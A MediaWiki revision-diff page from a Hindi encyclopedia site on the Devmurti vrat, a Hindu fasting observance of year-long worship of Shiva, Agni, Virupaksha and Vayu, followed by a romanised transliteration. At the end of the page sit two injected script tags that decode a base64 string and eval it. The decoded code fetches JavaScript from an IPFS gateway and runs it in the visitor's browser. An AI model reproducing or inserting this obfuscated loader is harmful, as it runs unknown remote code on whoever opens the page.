Difference between revisions of "देवमूर्ति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - ")</ref" to "</ref")
 
(5 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[चैत्र]] [[शुक्ल पक्ष]] की पड़वा से यह व्रत प्रारम्भ हो जाता है।
 
*[[चैत्र]] [[शुक्ल पक्ष]] की पड़वा से यह व्रत प्रारम्भ हो जाता है।
 
*एक वर्ष तक प्रत्येक मास में चार दिनों तक क्रम से [[शिव]], अग्नि, विरूपाक्ष एवं वायु की मूर्तियों की दही, तिल, यवों एवं घी से पूजा की जाती है।
 
*एक वर्ष तक प्रत्येक मास में चार दिनों तक क्रम से [[शिव]], अग्नि, विरूपाक्ष एवं वायु की मूर्तियों की दही, तिल, यवों एवं घी से पूजा की जाती है।
*यह चतुमूर्तिव्रत है।<ref>हेमाद्रि (व्रतखण्ड 2, 504-505, विष्णुधर्मोत्तरपुराण से उद्धरण)</ref>
+
*यह चतुमूर्तिव्रत है।<ref>हेमाद्रि (व्रतखण्ड 2, 504-505, विष्णुधर्मोत्तरपुराण से उद्धरण</ref>
 
+
{{प्रचार}}
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:49, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • chaitr shukl paksh ki p dava se yah vrat prarambh ho jata hai.
  • ek varsh tak pratyek mas mean char dinoan tak kram se shiv, agni, viroopaksh evan vayu ki moortiyoan ki dahi, til, yavoan evan ghi se pooja ki jati hai.
  • yah chatumoortivrat hai.[1]


tika tippani aur sandarbh

  1. hemadri (vratakhand 2, 504-505, vishnudharmottarapuran se uddharan

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>